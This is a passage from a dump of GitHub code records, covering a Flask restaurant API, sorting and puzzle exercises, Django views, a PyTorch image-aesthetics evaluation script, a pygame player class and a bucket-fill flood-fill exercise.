False)\n foodName = db.Column(db.String(100), nullable = False)\n description = db.Column(db.String(100), nullable = False)\n price = db.Column(db.Float, nullable = False)\n\n def __init__(self, foodID, restaurantID, foodName, description, price):\n self.foodID = foodID\n self.restaurantID = restaurantID\n self.foodName = foodName\n self.description = description\n self.price = price\n\n def json(self):\n return {\"foodID\" : self.foodID, \"restaurantID\" : self.restaurantID, \"foodName\" : self.foodName, \"description\": self.description, \"price\" : self.price}\n\n@app.route(\"/restaurant\")\n\ndef get_all():\n restaurantlist = Restaurant.query.all()\n if len(restaurantlist):\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : {\n \"restaurants\" : [restaurant.json() for restaurant in restaurantlist]\n }\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"There are no restaurants.\"\n }\n ), 404\n\n@app.route(\"/restaurant/\")\n\ndef find_by_restaurantID(restaurantID):\n restaurant = Restaurant.query.filter_by(restaurantID = restaurantID).first()\n if restaurant:\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : restaurant.json()\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"Restaurant not found.\"\n }\n ), 404\n \n\n@app.route(\"/restaurant/rider/\", methods=[\"GET\"])\ndef find_by_restaurantName(restaurantName):\n restaurant = Restaurant.query.filter_by(restaurantName = restaurantName).first()\n if restaurant:\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : restaurant.json()\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"Restaurant not found.\"\n }\n ), 404\n\n@app.route(\"/restaurant/\", methods=[\"POST\"])\n\ndef create_restaurant(restaurantID):\n if (Restaurant.query.filter_by(restaurantID = restaurantID).first()):\n return jsonify(\n {\n \"code\" : 400,\n \"data\" : {\n \"restaurantID\" : restaurantID\n },\n \"message\" : \"Restaurant already exists.\"\n }\n ), 400\n \n data = request.get_json()\n restaurant = Restaurant(restaurantID, **data)\n\n try:\n db.session.add(restaurant)\n db.session.commit()\n except:\n return jsonify(\n {\n \"code\" : 500,\n \"data\" : {\n \"restaurantID\" : 
restaurantID\n },\n \"message\" : \"An error occurred creating the book.\"\n }\n ), 500\n\n return jsonify(\n {\n \"code\" : 201,\n \"data\" : restaurant.json()\n }\n ), 201\n\n@app.route(\"/restaurant/food/\")\n\ndef find_food_by_restaurantID(restaurantID):\n foods = Food.query.filter_by(restaurantID = restaurantID).all()\n if foods:\n return jsonify(\n {\n \"code\" : 200,\n \"data\" : [food.json() for food in foods]\n }\n )\n return jsonify(\n {\n \"code\" : 404,\n \"message\" : \"Restaurant not found.\"\n }\n ), 404 \n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5005, debug=True)","repo_name":"auyongtingting/kirbyeats-fask","sub_path":"restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70368232488","text":"# Implement Bubble Sort\r\n\r\ndef bubble_sort(arr):\r\n n = len(arr)\r\n\r\n for i in range(n):\r\n\r\n for j in range(0, n-i-1):\r\n if arr[j] > arr[j+1]:\r\n arr[j], arr[j+1] = arr[j+1], arr[j]\r\n return arr\r\n\r\nbubbly = bubble_sort([20,50,30,100,60])\r\nprint(\"Bubble Sorted Array is: \", bubbly)\r\n\r\n# Implement Quick Sort\r\n\r\ndef quick_sort(arr2):\r\n\r\n if len(arr2) <= 1:\r\n return arr2\r\n \r\n pivot = arr2[len(arr2) // 2]\r\n left = []\r\n middle = []\r\n right = []\r\n\r\n for x in arr2:\r\n if x < pivot:\r\n left.append(x)\r\n elif x == pivot:\r\n middle.append(x)\r\n else:\r\n right.append(x)\r\n\r\n return quick_sort(left) + middle + quick_sort(right)\r\n\r\narr2 = [20,30,43,12,100,56,10]\r\nsorted_arr = quick_sort(arr2)\r\nprint(\"Quick Sorted Array is: \", sorted_arr)\r\n","repo_name":"Siddharth1047/code-till-job","sub_path":"Day-3(sort).py","file_name":"Day-3(sort).py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12020817731","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound , HttpResponseRedirect\nfrom django.urls import reverse\n\n# Create your views here.\n\n# def index(request):\n# return HttpResponse('Thats Works !')\n\n# def feb(request):\n# return HttpResponse(\"IT's Feb\")\n\nmonthly_challenges = {\n \"january\": \"This is january\",\n \"february\" : \"This is Feb\",\n \"march\" : \"This Is March\",\n \"april\":\"This Is April\",\n \"may\": \"This is May\"\n}\n\n\ndef monthly_challenge_by_number(request, month):\n months = list(monthly_challenges.keys())\n\n if month > len(months):\n return HttpResponseNotFound(\"Invalid Month\")\n\n redirect_month = months[month - 1]\n redirect_path = reverse(\"my-app\",args=[redirect_month]) #/myapp/january \"my-app\"-->myapp////args-->/month\n return HttpResponseRedirect(redirect_path)\n\n\ndef monthly_challenge(request,month):\n try:\n challenge_text = monthly_challenges[month]\n response_data = f\"

    {challenge_text}

    \"\n return HttpResponse(response_data)\n except:\n return HttpResponseNotFound(\"This is not found\") \n ","repo_name":"KirolosTawadros/DjangoChallenge","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70568954090","text":"import numpy as np\r\n\r\ndef block_id(i, j):\r\n r = i // 3\r\n c = j // 3\r\n return 3 * r + c\r\n\r\nclass Solution:\r\n def isValidSudoku(self, board: List[List[str]]) -> bool:\r\n row_state = np.array([False] * 9 * 9, np.bool_).reshape(9, 9)\r\n col_state = np.array([False] * 9 * 9, np.bool_).reshape(9, 9)\r\n block_state = np.array([False] * 9 * 9, np.bool_).reshape(9, 9)\r\n for i in range(9):\r\n for j in range(9):\r\n if board[i][j] != \".\":\r\n num = int(board[i][j])\r\n if row_state[i][num - 1]:\r\n return False\r\n row_state[i][num - 1] = True\r\n if col_state[j][num - 1]:\r\n return False\r\n col_state[j][num - 1] = True\r\n if block_state[block_id(i, j)][num - 1]:\r\n return False\r\n block_state[block_id(i, j)][num - 1] = True\r\n return True\r\n","repo_name":"FennelDumplings/leetcode-maxed_out","sub_path":"algorithm/python/prob1-500/prob32_medium_Valid-Sudoku.py","file_name":"prob32_medium_Valid-Sudoku.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"20829567050","text":"\"\"\"This module creates universities into the city\"\"\"\nimport random\n\n\ndef create_universities(houses):\n \"\"\"\n this function creates universities\n Args:\n houses ([Polygon]): houses of the city\n Returns:\n [Polygon], [Polygon]: new list of houses, universities\n \"\"\"\n universities = []\n new_houses = []\n\n for house in houses:\n if random.randint(0, 35) == 1:\n universities.append(house)\n else:\n new_houses.append(house)\n return new_houses, universities\n","repo_name":"Adrien-ANTON-LUDWIG/Medieval-town-map-generator","sub_path":"src/town_generator/university.py","file_name":"university.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7756527614","text":"from itertools import permutations # 조합\nimport math\n\ndef is_prime_number(n):\n \"\"\"소수판별 함수\"\"\"\n if n == 0 or n == 1: # 0,1 은 소수가 아님\n return False\n else:\n for i in range(2, int(math.sqrt(n)) + 1): # sqrt(n)까지만 for문을 돌면서 확인하면 된다.\n if n % i == 0: # 2~sqrt(num)까지 나누어 떨어지는 숫자가 있으면 소수가 아님\n return False\n return True\n\n\ndef solution(numbers):\n answer = []\n for i in range(1,len(numbers)+1):\n arr = list(permutations(numbers, i))\n for j in range(len(arr)):\n num = int(''.join(map(str,arr[j])))\n if is_prime_number(num):\n answer.append(num)\n\n return len(set(answer))\n\n\ns = [\"17\", \"011\"]\nfor ss in s:\n print(solution(ss))\n","repo_name":"commin-pg/coding_test","sub_path":"com/practice/programmers/소수찾기.py","file_name":"소수찾기.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70838932968","text":"import pygame\nimport settings\n\ndisplay_surface = pygame.display.set_mode((settings.DISPLAY_WIDTH, settings.DISPLAY_HEIGHT))\n\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self, pos, groups, obstacle_sprites, entrance_sprites):\n\t\tsuper().__init__(groups)\n\n\t\tself.load_animation_sprites()\n\n\t\tself.screen = 
pygame.display.get_surface()\n\n\t\tself.current_sprite = 0\n\t\tself.image = self.walk_front_frames[self.current_sprite]\n\t\tself.previous_sprite_list = self.walk_front_frames\n\n\t\tself.current_dust = 0\n\t\tself.dust_image = self.dust_right_frames[self.current_dust]\n\n\t\tself.rect = self.image.get_rect(topleft = pos)\n\t\tself.hitbox = self.rect.inflate(-10, 0)\n\n\t\tself.direction = pygame.math.Vector2()\n\t\tself.speed = 3\n\n\t\tself.obstacle_sprites = obstacle_sprites\n\t\tself.entrance_sprites = entrance_sprites\n\n\t\tself.custom_font = pygame.font.Font('./Levels/LevelOne/fonts/ArcadeFont.ttf', 12)\n\n\t\tself.temp_x = 0\n\t\tself.temp_y = 0\n\t\tself.footstep = pygame.mixer.Sound('./SFX/footstep_two.wav')\n\n\tdef input(self): \n\t\tkeys = pygame.key.get_pressed()\n\n\t\tif keys[pygame.K_w] or keys[pygame.K_UP]: \n\t\t\tself.direction.y = -1\n\t\telif keys[pygame.K_s] or keys[pygame.K_DOWN]: \n\t\t\tself.direction.y = 1\n\t\telse: \n\t\t\tself.direction.y = 0\n\n\t\tif keys[pygame.K_d] or keys[pygame.K_RIGHT]: \n\t\t\tself.direction.x = 1\n\t\telif keys[pygame.K_a] or keys[pygame.K_LEFT]: \n\t\t\tself.direction.x = -1\n\t\telse: \n\t\t\tself.direction.x = 0\n\n\n\tdef move(self, speed): \n\t\tif self.direction.magnitude() != 0: \n\t\t\tself.direction = self.direction.normalize() * 2\n\n\t\tif abs(self.hitbox.x - self.temp_x) > 100:\n\t\t\tself.temp_x = self.hitbox.x\n\t\t\tself.footstep.play()\n\t\tif abs(self.hitbox.y - self.temp_y) > 100:\n\t\t\tself.temp_y = self.hitbox.y\n\t\t\tself.footstep.play()\n\n\t\t# here i want to check if the player is walking on the bridge\n\t\t# x coordinates are 1305-1568, y coordinates are 901\n\t\t# if player is on any of these coordinates, i want the y coordinate to be 891\n\t\tif self.hitbox.x >= 1305 and self.hitbox.x <= 1568 and self.hitbox.y == 901:\n\t\t\tself.hitbox.y = 891\n\t\t\tself.hitbox.x += self.direction.x * speed\n\t\t\tself.collision('horizontal')\n\t\telse:\n\t\t\tself.hitbox.x += self.direction.x * speed\n\t\t\tself.collision('horizontal')\n\t\t\tself.hitbox.y += self.direction.y * speed\n\t\t\tself.collision('vertical')\n\n\t\t\n\t\tself.rect.center = self.hitbox.center\n\n\tdef collision(self, direction): \n\t\tif direction == 'horizontal': \n\t\t\tfor sprite in self.obstacle_sprites: \n\t\t\t\tif sprite.hitbox.colliderect(self.hitbox): \n\t\t\t\t\tif self.direction.x > 0: \n\t\t\t\t\t\tself.hitbox.right = sprite.hitbox.left\n\t\t\t\t\tif self.direction.x < 0: \n\t\t\t\t\t\tself.hitbox.left = sprite.hitbox.right\n\n\t\tif direction == 'vertical': \n\t\t\tfor sprite in self.obstacle_sprites: \n\t\t\t\tif sprite.hitbox.colliderect(self.hitbox): \n\t\t\t\t\tif self.direction.y > 0: \n\t\t\t\t\t\tself.hitbox.bottom = sprite.hitbox.top\n\t\t\t\t\tif self.direction.y < 0: \n\t\t\t\t\t\tself.hitbox.top = sprite.hitbox.bottom\n\n\t\tcollided_entrance = pygame.sprite.spritecollideany(self, self.entrance_sprites)\n\t\tif collided_entrance and not settings.transition:\n\t\t\tlevel_request = True\n\t\t\t# video : \n\t\t\tif collided_entrance.level_number == 1 or collided_entrance.level_number == 2 or collided_entrance.level_number == 3:\n\t\t\t\tmessages = ['You are about to enter level ' + str(collided_entrance.level_number) + '.', \n\t\t\t\t\t\t\t'It is not that hard',\n\t\t\t\t\t\t\t'Are you sure you want to enter?',\n\t\t\t\t\t\t\t'Yes (Y) or No (N)']\n\t\t\t# if the user is entering a tutorial:\n\t\t\telif collided_entrance.level_number % 1 == 0.5:\n\t\t\t\tmessages = ['This is a tutorial house.', \n\t\t\t\t\t\t\t'Are you sure 
you want to enter?',\n\t\t\t\t\t\t\t'Yes (Y) or No (N)']\n\t\t\t# if the user wants to return to the main menu\n\t\t\telif collided_entrance.level_number == -1:\n\t\t\t\tmessages = ['You\\'re going to the main menu.', \n\t\t\t\t\t\t\t'Do you want to continue?',\n\t\t\t\t\t\t\t'Yes (Y) or No (N)']\n\t\t\tsnip = self.custom_font.render('', True, (255, 255, 255))\n\t\t\tcounter = 0\n\t\t\t# the bigger the speed variable, the slower it goes because of math\n\t\t\tspeed = 4\n\t\t\tactive_message = 0\n\t\t\tmessage = messages[active_message]\n\t\t\tdone = False\n\t\t\t\n\n\t\t\twhile level_request:\n\t\t\t\tpygame.draw.rect(display_surface, (0, 0, 0), pygame.Rect(225, 70, 400, 70))\n\t\t\t\tpygame.draw.rect(display_surface, (255, 255, 255), pygame.Rect(230, 75, 390, 60))\n\n\t\t\t\tif counter < speed * len(message):\n\t\t\t\t\tcounter += 1\n\t\t\t\telif counter >= speed * len(message):\n\t\t\t\t\tdone = True\n\t\t\t\tfor event in pygame.event.get():\n\t\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\t\tif event.key == pygame.K_RETURN and done and active_message < len(messages) - 1:\n\t\t\t\t\t\t\tactive_message += 1\n\t\t\t\t\t\t\tdone = False\n\t\t\t\t\t\t\tmessage = messages[active_message]\n\t\t\t\t\t\t\tcounter = 0\n\t\t\t\t\t\telif event.key == pygame.K_y: \n\t\t\t\t\t\t\t#transition and change game state\n\t\t\t\t\t\t\tsettings.next_game_state = collided_entrance.level_number\n\t\t\t\t\t\t\tsettings.transition = True\n\t\t\t\t\t\t\tpygame.image.save(self.screen,\"./LevelSelector/TransitionImages/screenshot.png\")\n\t\t\t\t\t\t\tlevel_request = False\t\t\t\n\n\t\t\t\t\t\t\t#change music\n\t\t\t\t\t\t\tpygame.mixer.music.stop()\n\t\t\t\t\t\t\tpygame.mixer.Sound.play(pygame.mixer.Sound('./SFX/transition_sound.wav'))\n\t\t\t\t\t\t\tpygame.time.delay(1000)\n\t\t\t\t\t\t\tif not settings.mute:\n\t\t\t\t\t\t\t\tif settings.next_game_state == -1:\n\t\t\t\t\t\t\t\t\tpygame.image.save(self.screen, \"./LevelSelector/TransitionImages/screenshot.png\")\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/menu_music.mp3')\n\t\t\t\t\t\t\t\telif settings.next_game_state == 1:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/level_one_bg.mp3')\n\t\t\t\t\t\t\t\telif settings.next_game_state == 2:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/levelTwo.mp3')\n\t\t\t\t\t\t\t\telif settings.next_game_state == 3:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.load('./SFX/levelThree.mp3')\n\t\t\t\t\t\t\t\tif settings.next_game_state == -1 or settings.next_game_state == 1 or settings.next_game_state == 2 or settings.next_game_state == 3:\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.play(-1)\n\t\t\t\t\t\t\t\t\tpygame.mixer.music.set_volume(0.1)\n\t\t\t\t\t\telif event.key == pygame.K_n: \n\t\t\t\t\t\t\tself.hitbox.y += 20\n\t\t\t\t\t\t\tlevel_request = False\n\t\t\t\t\n\t\t\t\tsnip = self.custom_font.render(message[0:counter//speed], True, (0, 0, 0))\n\t\t\t\tif active_message == 3:\n\t\t\t\t\tdisplay_surface.blit(snip, (330, 100))\t\n\t\t\t\telse:\n\t\t\t\t\tdisplay_surface.blit(snip, (240, 100))\n\n\t\t\t\tpygame.display.flip()\n\n\n\tdef update(self): \n\t\t# self.screen.blit(self.hitbox)\n\t\tself.input()\n\t\tself.move(self.speed)\n\t\tself.check_animations()\n\n\n\tdef animate(self, sprite_list, speed, idle = False):\n # loop through sprite list and change current sprite \n\t\tif idle: \n\t\t\tself.image = sprite_list[0]\n\n\t\tif not idle: \n\t\t\tif self.current_sprite < len(sprite_list) - 0.1:\n\t\t\t\tself.current_sprite += speed\n\t\t\telse:\n\t\t\t\tself.current_sprite = 0\n\n\t\t\tself.image = 
sprite_list[int(self.current_sprite)]\n\n\t\tself.previous_sprite_list = sprite_list\n\n\tdef animate_dust(self, pos_x, pos_y, speed): \n\t\tif self.current_dust < len(self.dust_right_frames) - 0.1:\n\t\t\t\tself.current_dust += speed\n\t\telse:\n\t\t\tself.current_dust = 0\n\n\t\tself.dust_image = self.dust_right_frames[int(self.current_sprite)]\n\t\tself.screen.blit(self.dust_image, (settings.DISPLAY_WIDTH // 2 + pos_x, settings.DISPLAY_HEIGHT // 2 + pos_y))\n\n\n\tdef check_animations(self):\n\t\tkeys = pygame.key.get_pressed()\n\n\t\tif (keys[pygame.K_LEFT] or keys[pygame.K_a]) and self.direction.x < 0:\n\t\t\tself.animate(self.walk_left_frames, 0.1)\n\t\t\tself.animate_dust(9, 11, 0.1)\n\t\telif (keys[pygame.K_RIGHT] or keys[pygame.K_d] and self.direction.x > 0):\n\t\t\tself.animate(self.walk_right_frames, 0.1)\n\t\t\tself.animate_dust(-22, 11, 0.1)\n\t\telif (keys[pygame.K_UP] or keys[pygame.K_w]):\n\t\t\tself.animate(self.walk_back_frames, 0.1)\n\t\t\tself.animate_dust(0, 20, 0.1)\n\t\telif (keys[pygame.K_DOWN] or keys[pygame.K_s]):\n\t\t\tself.animate(self.walk_front_frames, 0.1)\n\t\t\tself.animate_dust(0, -24, 0.1)\n\t\telse: \n\t\t\tself.animate(self.previous_sprite_list, 0.1, True)\n\n\n\n\tdef load_animation_sprites(self):\n\t\tself.walk_back_frames = []\n\t\tself.walk_front_frames = []\n\t\tself.walk_right_frames = []\n\t\tself.walk_left_frames = []\n\n\t\tself.dust_right_frames = []\n\t\tself.dust_left_frames = []\n\n\t\tfor i in range(1, 4):\n\t\t\tself.walk_back_frames.append(pygame.image.load(f'./LevelSelector/SpritesAndArt/sprite animations/back/back({i}).png').convert_alpha())\n\t\t\tself.walk_front_frames.append(pygame.image.load(f'./LevelSelector/SpritesAndArt/sprite animations/front/front({i}).png').convert_alpha())\n\t\t\tself.walk_right_frames.append(pygame.image.load(f'./LevelSelector/SpritesAndArt/sprite animations/right/right({i}).png').convert_alpha())\n\n\t\tself.walk_back_frames.insert(2, pygame.image.load('./LevelSelector/SpritesAndArt/sprite animations/back/back(1).png').convert_alpha())\n\t\tself.walk_front_frames.insert(2, pygame.image.load('./LevelSelector/SpritesAndArt/sprite animations/front/front(1).png').convert_alpha())\n\t\tself.walk_right_frames.insert(2, pygame.image.load('./LevelSelector/SpritesAndArt/sprite animations/right/right(1).png').convert_alpha())\n\n\t\tfor frame in self.walk_right_frames:\n\t\t\tself.walk_left_frames.append(pygame.transform.flip(frame, True, False))\n\n\t\tfor i in range (1, 8):\n\t\t\tself.dust_right_frames.append(pygame.image.load(f\"./LevelSelector/SpritesAndArt/running dust/Split/dust({i}).png\"))\n\n\t\tfor frame in self.dust_right_frames:\n\t\t\tself.dust_left_frames.append(pygame.transform.flip(frame, True, False))\n\n","repo_name":"EL132/platformer","sub_path":"output/main/LevelSelector/Code/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9164,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"40212308354","text":"\"\"\"Given an array of integers.\r\n\r\nReturn an array, where the first element is the count of positives numbers and the second element is sum of negative numbers.\r\n\r\nIf the input array is empty or null, return an empty array.\r\nExample\r\n\r\nFor input [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, -11, -12, -13, -14, -15], you should return [10, -65].\"\"\"\r\n\r\ndef count_positives_sum_negatives(lst):\r\n if not lst:\r\n return []\r\n pos, neg = 0,0\r\n for i in lst:\r\n if i <= 0:\r\n neg += i\r\n else:\r\n pos += 1\r\n 
return [pos,neg]\r\n","repo_name":"nadiabahrami/c_war_practice","sub_path":"level_8/posnegcases.py","file_name":"posnegcases.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14630674664","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\n\nimport numpy as np\n# import matplotlib\n# matplotlib.use('Agg')\n# import matplotlib.pyplot as plt\n\nimport torch\nimport torch.autograd as autograd\nimport torch.optim as optim\n\nimport torchvision.transforms as transforms\nimport torchvision.datasets as dsets\nimport torchvision.models as models\n\n# import lrs\nimport tensorboardX\n\nfrom ILGNet import ILGNet\nfrom data_loader import AVADataset\n\nfrom tensorboardX import SummaryWriter\n\n\ndef getName(prefix):\n import socket\n from datetime import datetime\n current_time = datetime.now().strftime('%b%d_%H-%M-%S')\n log_dir = os.path.join(prefix, current_time + '_' + socket.gethostname())\n return log_dir\n\n\nwriter = SummaryWriter(getName(\"/data/output/\"))\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef compute_acc(label: torch.Tensor, pred: torch.Tensor):\n dist = torch.arange(10).float().to(device)\n l_mean = (label.view(-1, 10) * dist).sum(dim=1)\n l_good = l_mean > 5\n acc = (pred.argmax(dim=1).byte() == l_good).float().mean()\n return acc\n\n\ndef main(config):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n val_transform = transforms.Compose([\n transforms.Scale(260),\n transforms.RandomCrop(227),\n transforms.ToTensor()])\n\n valset = AVADataset(csv_file=config.val_csv_file, root_dir=config.val_img_path, transform=val_transform)\n val_loader = torch.utils.data.DataLoader(valset, batch_size=config.val_batch_size,\n shuffle=False, num_workers=config.num_workers)\n\n model = ILGNet()\n model.load_state_dict(torch.load('/data/jinjing/ILGNet_pytorch.pth'))\n model = model.to(device)\n\n param_num = 0\n for param in model.parameters():\n param_num += int(np.prod(param.shape))\n print('Trainable params: %.2f million' % (param_num / 1e6))\n\n step = 0\n # do validation after each epoch\n batch_val_losses = []\n val_acc = []\n for i, data in enumerate(val_loader):\n print(i)\n model.eval()\n images = data['image'].to(device)\n labels = data['annotations'].to(device).float()\n with torch.no_grad():\n outputs = model(images)\n step += 1\n val_acc.append(compute_acc(labels, outputs))\n\n writer.add_scalar('val/accuracy', np.mean(val_acc), step)\n print(np.mean(val_acc))\n print('done')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n # input parameters\n parser.add_argument('--train_img_path', type=str, default='/data/full_ava/train/images/')\n parser.add_argument('--val_img_path', type=str, default='/data/full_ava/train/images/')\n parser.add_argument('--test_img_path', type=str, default='/data/full_ava/train/images/')\n parser.add_argument('--train_csv_file', type=str, default='/data/full_ava/train/train.csv')\n parser.add_argument('--val_csv_file', type=str, default='/data/full_ava/train/val.csv')\n parser.add_argument('--test_csv_file', type=str, default='/data/full_ava/train/test.csv')\n\n # training parameters\n parser.add_argument('--train', type=bool, default=True)\n parser.add_argument('--test', type=bool, default=False)\n parser.add_argument('--conv_base_lr', type=float, default=1e-3)\n parser.add_argument('--dense_lr', type=float, default=1e-2)\n 
parser.add_argument('--lr_decay_rate', type=float, default=0.95)\n parser.add_argument('--lr_decay_freq', type=int, default=10)\n parser.add_argument('--train_batch_size', type=int, default=128)\n parser.add_argument('--val_batch_size', type=int, default=256)\n parser.add_argument('--test_batch_size', type=int, default=1)\n parser.add_argument('--num_workers', type=int, default=16)\n parser.add_argument('--epochs', type=int, default=100)\n\n # misc\n parser.add_argument('--ckpt_path', type=str, default='/data/output/')\n parser.add_argument('--multi_gpu', type=bool, default=False)\n parser.add_argument('--gpu_ids', type=list, default=None)\n parser.add_argument('--warm_start', type=bool, default=False)\n parser.add_argument('--warm_start_epoch', type=int, default=0)\n parser.add_argument('--early_stopping_patience', type=int, default=5)\n parser.add_argument('--save_fig', type=bool, default=False)\n\n # config = parser.parse_args()\n config, unknown = parser.parse_known_args()\n writer.add_text(\"Config\", str(config))\n\n main(config)\n","repo_name":"VoVAllen/ILGNet_pytorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23663605896","text":"\"\"\" Coursework 1: Bucket Fill\n\"\"\"\nimport copy\nimport random\n\ndef load_image(filename):\n \"\"\" Load image from file made of 0 (unfilled pixels) and 1 (boundary pixels) and 2 (filled pixel)\n\n Example of content of filename:\n\n0 0 0 0 1 1 0 0 0 0\n0 0 1 1 0 0 1 1 0 0\n0 1 1 0 0 1 0 1 1 0\n1 1 0 0 1 0 1 0 1 1\n1 0 0 1 0 0 1 0 0 1\n1 0 0 1 0 0 1 0 0 1\n1 1 0 1 0 0 1 0 1 1\n0 1 1 0 1 1 0 1 1 0\n0 0 1 1 0 0 1 1 0 0\n0 0 0 0 1 1 0 0 0 0\n\n Args:\n filename (str) : path to file containing the image representation\n\n Returns:\n list : a 2D representation of the filled image, where\n 0 represents an unfilled pixel,\n 1 represents a boundary pixel\n 2 represents a filled pixel\n \"\"\"\n\n image = []\n with open(filename) as imagefile:\n for line in imagefile:\n if line.strip():\n row = list(map(int, line.strip().split()))\n image.append(row)\n return image\n\n\ndef stringify_image(image):\n \"\"\" Convert image representation into a human-friendly string representation\n\n Args:\n image (list) : list of lists of 0 (unfilled pixel), 1 (boundary pixel) and 2 (filled pixel)\n\n Returns:\n str : a human-friendly string representation of the image\n \"\"\"\n \n if image is None:\n return \"\"\n\n # The variable \"mapping\" defines how to display each type of pixel.\n mapping = {\n 0: \" \",\n 1: \"*\",\n 2: \"0\"\n }\n\n image_str = \"\"\n if image:\n image_str += \"_ \" * (len(image[0]) + 2) + \"\\n\"\n for row in image:\n image_str += \"| \"\n for pixel in row:\n image_str += mapping.get(pixel, \"?\") + \" \"\n image_str += \"|\"\n image_str += \"\\n\"\n if image:\n image_str += \"‾ \" * (len(image[0]) + 2) + \"\\n\"\n\n return image_str\n\n\ndef show_image(image):\n \"\"\" Show image in terminal\n\n Args:\n image (list) : list of lists of 0 (unfilled pixel), 1 (boundary pixel) and 2 (filled pixel)\n \"\"\"\n print(stringify_image(image))\n\n\n## My function\ndef is_unfilled(image, row, col):\n '''\n Check whether a pixel is unfilled, i.e. has label 0. 
\n '''\n if (row < 0 or row > len(image) - 1):\n return False\n\n if (col < 0 or col > len(image[0]) - 1):\n return False\n\n if image[row][col] == 0:\n return True\n else:\n return False\n\n \ndef fill(image, seed_point):\n \"\"\" Fill the image from seed point to boundary\n\n the image should remain unchanged if:\n - the seed_point has a non-integer coordinate\n - the seed_point has a negative coordinate\n - the seed_point is outside of the image\n - the seed_point is on a boundary pixel\n \n Args:\n image (list) : a 2D nested list representation of an image, where\n 0 represents an unfilled pixel, and\n 1 represents a boundary pixel\n seed_point (tuple) : a 2-element tuple representing the (row, col) \n coordinates of the seed point to start filling\n\n Returns:\n list : a 2D representation of the filled image, where\n 0 represents an unfilled pixel,\n 1 represents a boundary pixel, and\n 2 represents a filled pixel\n \"\"\"\n row = seed_point[0]\n col = seed_point[1]\n filled_image = copy.deepcopy(image) # To ensure that image remains unchanged in test cases\n \n if (isinstance(row, int) and isinstance(col, int)) == False:\n # print(\"The seed point has a non-integer coordinate.\")\n return filled_image\n \n if row < 0 or col < 0:\n # print(\"The seed point has a negative coordinate.\") \n return filled_image\n \n if row > len(filled_image) - 1 or col > len(filled_image[0]) - 1:\n # print(\"The seed point is outside the image.\") \n return filled_image\n \n if filled_image[row][col] == 1:\n # print(\"The seed point is on a boundary pixel.\") \n return filled_image\n\n p = [] # Initiate an empty list of points\n filled_image[row][col] = 2 # Fill the seed point \n p.append((row, col)) # Add the seed point to the list\n\n while len(p) > 0:\n (cur_row, cur_col) = p[0]\n del p[0] # To ensure that new neighbouring points are explored\n\n if is_unfilled(filled_image, cur_row - 1, cur_col):\n filled_image[cur_row - 1][cur_col] = 2\n p.append((cur_row - 1, cur_col))\n\n if is_unfilled(filled_image, cur_row + 1, cur_col):\n filled_image[cur_row + 1][cur_col] = 2\n p.append((cur_row + 1, cur_col))\n\n if is_unfilled(filled_image, cur_row, cur_col - 1):\n filled_image[cur_row][cur_col - 1] = 2\n p.append((cur_row, cur_col - 1))\n\n if is_unfilled(filled_image, cur_row, cur_col + 1):\n filled_image[cur_row][cur_col + 1] = 2\n p.append((cur_row, cur_col + 1))\n\n return filled_image\n\n\n## Testing \n# Test for 1*1 images\ndef test_one_pixel():\n pixel_1 = [[0]]\n pixel_2 = [[1]]\n seed_point = (0,0)\n filled_image_1 = fill(pixel_1, seed_point)\n filled_image_2 = fill(pixel_2, seed_point)\n expected_image_1 = [[2]]\n expected_image_2 = [[1]]\n assert(filled_image_1 == expected_image_1)\n assert(filled_image_2 == expected_image_2)\n\n \n# Test for a 1*2 image\ndef test_small_image():\n small_image = [[0],[1]]\n seed_point_1 = (0,0) # Start at an unfilled pixel\n seed_point_2 = (0,1) # Start at a boundary pixel\n filled_image_1 = fill(small_image, seed_point_1)\n filled_image_2 = fill(small_image, seed_point_2)\n expected_image_1 = [[2],[1]]\n expected_image_2 = [[0],[1]]\n assert(filled_image_1 == expected_image_1)\n assert(filled_image_2 == expected_image_2)\n\n\n# Test for a 5*6 image with different seed point locations\nexample_image = [[0, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 1, 0],\n [0, 1, 